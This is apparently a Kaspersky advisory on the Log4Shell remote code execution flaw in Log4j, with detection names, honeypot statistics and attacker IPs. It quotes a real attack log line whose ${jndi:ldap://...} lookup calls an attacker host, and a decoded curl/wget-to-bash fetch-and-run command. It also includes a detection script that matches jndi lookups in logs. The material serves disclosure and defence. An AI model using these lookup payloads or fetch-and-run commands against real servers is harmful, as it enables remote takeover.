CVE-2021-44228 vulnerability in Apache Log4j library

Updated 2021-12-16

CVE-2021-44228 summary

Last week, information security media reported the discovery of the critical vulnerability CVE-2021-44228 in the Apache Log4j library (CVSS severity level 10 out of 10). The threat, also named Log4Shell or LogJam, is a Remote Code Execution (RCE) class vulnerability. If an attacker manages to exploit it on a vulnerable server, they gain the ability to execute arbitrary code and potentially take full control of the system. A publicly available Proof-of-Concept, together with the ease of exploiting the vulnerability, makes this situation particularly dangerous.
Kaspersky is aware of PoCs in the public domain and of the possible exploitation of CVE-2021-44228 by cybercriminals. Our products protect against attacks leveraging the vulnerability, including PoC usage. Possible detection names are:

  • UMIDS:Intrusion.Generic.CVE-2021-44228.*
  • PDM:Exploit.Win32.Generic

KATA verdicts:

  • Exploit.CVE-2021-44228.TCP.C&C
  • Exploit.CVE-2021-44228.HTTP.C&C
  • Exploit.CVE-2021-44228.UDP.C&C

Geography of CVE-2021-44228 scan and exploitation attempts, December 2021

CVE-2021-44228 technical details

The remote code execution vulnerability CVE-2021-44228 was found in the Apache Log4j library, a part of the Apache Logging Project. If a product uses a vulnerable version of this library with the JNDI module for logging purposes, there is a high possibility that this vulnerability can be exploited. Almost all versions of Log4j are vulnerable, from 2.0-beta9 to 2.14.1.
Log4j includes a Lookup mechanism that can be used to make requests through special syntax in a format string. For example, it can be used to request various parameters, such as the version of the Java environment via ${java:version}. When the jndi key is specified in the string, the Lookup mechanism uses the JNDI API. By default, all requests are made using the prefix java:comp/env/; however, the authors implemented the option of using a custom prefix by means of a colon symbol in the key. This is where the vulnerability lies: if jndi:ldap:// is used as the key, the request goes to the specified LDAP server. Other communication protocols, such as LDAPS, DNS and RMI, can also be used.

Kaspersky has been monitoring telemetry related to exploitation of CVE-2021-44228 vulnerability, successfully extracting the URLs used by the attackers. Noteworthy examples can be found below.

Analysis of the URLs showed how the attackers tried to insert the payload in uncommon fields, such as User-Agent, the data field, and the URI parameter. This is an example of an evasion technique aimed at bypassing the simple blocking measures that many companies apply to protect against this kind of attack.

The following excerpt shows an exploitation attempt as displayed in HTTP server logs.
45.155.205[.]233:53590 server:80 - [10/Dec/2021:13:25:10 +0000] "GET / HTTP/1.1" 200 1671 "-" "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/[BASE64-code-removed]}"

The base64 string in the request above decodes to:
(curl -s||wget -q -O-|bash
The code fetches a malicious script from and subsequently runs it using Bash.

Thus, an attacker-controlled remote server could return some object to a vulnerable server, potentially leading to arbitrary code execution on the system or to leakage of confidential data. All an attacker needs to do is send a special string through a mechanism that writes this string to a log file, where it is handled by the Log4j library. This can be done with simple HTTP requests, for example ones sent through web forms, data fields, etc., or with any other kind of interaction that uses server-side logging.
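The log excerpt above shows the lookup string in the User-Agent field, and the preceding paragraph notes that attackers also placed it in the URI and other logged fields. The following script is an added example (not code from the original post or from Kaspersky) showing how a defender can scan HTTP server logs for ${jndi:...} lookups in any field, extract the callback protocol, host, port and path, decode a /Base64/ command segment for analysis, and tally hits per source IP. The log lines, IPs and the base64 payload (which decodes to a harmless placeholder) are constructed for the example; the helper names are the example's own.

```python
import base64
import binascii
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlsplit

# Constructed sample log lines in the same layout as the post's excerpt.
# IPs are defanged with "[.]"; the base64 segment is a constructed placeholder
# ("echo constructed-sample"), not a real attacker command.
SAMPLE_LOG = r"""
45.155.205[.]233:53590 server:80 - [10/Dec/2021:13:25:10 +0000] "GET / HTTP/1.1" 200 1671 "-" "${jndi:ldap://45.155.205[.]233:12344/Basic/Command/Base64/ZWNobyBjb25zdHJ1Y3RlZC1zYW1wbGU=}"
147.182.131[.]229:41022 server:80 - [11/Dec/2021:12:00:01 +0000] "GET /?x=${jndi:dns://147.182.131[.]229/probe} HTTP/1.1" 200 1671 "-" "Mozilla/5.0"
147.182.131[.]229:41023 server:80 - [11/Dec/2021:12:00:02 +0000] "POST /login HTTP/1.1" 302 0 "${jndi:rmi://147.182.131[.]229:1099/obj}" "curl/7.68.0"
10.0.0.5:51234 server:80 - [11/Dec/2021:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Source IP (with optional :port), two tokens, then the bracketed timestamp.
LOG_LINE_RE = re.compile(
    r"^(?P<src>[^\s:]+)(?::\d+)?\s+\S+\s+\S+\s+\[(?P<ts>[^\]]+)\]\s+(?P<rest>.*)$"
)
# A ${jndi:<scheme>://<target>} lookup, matched case-insensitively anywhere in the line.
# Schemes limited to those named in the post (LDAP, LDAPS, DNS, RMI).
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>ldaps?|dns|rmi)://(?P<target>[^}\s\"]+)\}", re.IGNORECASE
)
# Base64 command segment in the style of the excerpt's /Basic/Command/Base64/<data> path.
BASE64_PATH_RE = re.compile(r"/Base64/(?P<b64>[A-Za-z0-9+/=]+)")


def refang(value: str) -> str:
    """Turn the defanged '[.]' notation back into a real dot for parsing."""
    return value.replace("[.]", ".")


def decode_base64_command(path: str) -> Optional[str]:
    """Decode a /Base64/<data> path segment for analysis; None if absent or malformed."""
    m = BASE64_PATH_RE.search(path)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def find_jndi_lookups(line: str) -> List[Dict]:
    """Return every JNDI lookup found in the line, with its callback URL broken down."""
    hits = []
    for m in JNDI_RE.finditer(line):
        parts = urlsplit(f"{m.group('scheme').lower()}://{refang(m.group('target'))}")
        hits.append(
            {
                "scheme": parts.scheme,
                "host": parts.hostname,
                "port": parts.port,          # None when the URL carries no explicit port
                "path": parts.path,
                "payload": decode_base64_command(parts.path),
            }
        )
    return hits


def scan_log(text: str) -> List[Dict]:
    """Scan access-log text and return one event per JNDI lookup, tagged with the source IP."""
    events = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = LOG_LINE_RE.match(line)
        source_ip = refang(m.group("src")) if m else "unknown"
        for hit in find_jndi_lookups(line):
            hit["source_ip"] = source_ip
            hit["timestamp"] = m.group("ts") if m else None
            events.append(hit)
    return events


def top_sources(events: List[Dict], n: int = 10) -> List[Tuple[str, int]]:
    """Most active source IPs, in the same shape as the post's TOP 10 table."""
    return Counter(e["source_ip"] for e in events).most_common(n)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for e in found:
        print(f"{e['source_ip']} -> {e['scheme']}://{e['host']}:{e['port']}{e['path']} payload={e['payload']!r}")
    print("top sources:", top_sources(found))
```

Because the lookup regex runs over the whole line rather than a specific field, a payload placed in the URI, the User-Agent, the Referer or any other logged header is caught the same way; matching is case-insensitive so mixed-case variants of the jndi key are not missed. The decoded payload is returned as data only, for triage.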

CVE-2021-44228 exploitation statistics

Data originating from our honeypots shows a total of 8646 exploitation attempts between December 10th and December 12th, with peak activity occurring on December 11th at 12:00 GMT at an hourly rate of 1700 malicious requests.

log4j exploitation attempts per hour, December 10th through 12th

Below are the TOP 10 most active attacker IPs we have observed so far.

Source IP            Country   Total number of requests
147.182.131[.]229    USA       948
147.182.215[.]36     USA       789
137.184.28[.]58      USA       693
195.54.160[.]149     Russia    201
45.155.205[.]233     Germany   182
5.157.38[.]50        Sweden    134
46.105.95[.]220      France    108
131.100.148[.]7      Brazil    104
113.141.64[.]14      China     103
221.228.87[.]37      China      83

We observed malicious requests coming to our honeypots from across the globe, with the most requests being made from the countries in the table below.

Country           Total number of requests
United States     1284
China              623
Germany            602
United Kingdom     497
Canada             477
Netherlands        476
Singapore          449
France             420
Australia          403
Japan              372

The systems most affected by mass scanning activity and attempts to leverage the exploit code were as follows.

ASN                                     Total number of requests
M247 Ltd                                1190
OOO Network of data-centers Selectel     833
Host Universal Pty Ltd                   547
Gigabit Hosting Sdn Bhd                  316
Hydra Communications Ltd                 247
Event Zero                               239
Intertelecom Ltd                         196

Mitigations for CVE-2021-44228

Affected Kaspersky products

Supported Kaspersky products are not affected by the CVE-2021-44228 vulnerability.

Indicators of compromise (IOC)


This post appeared first on SecureList – Kaspersky Lab’s Cyberthreat Research and Reports
Author: AMR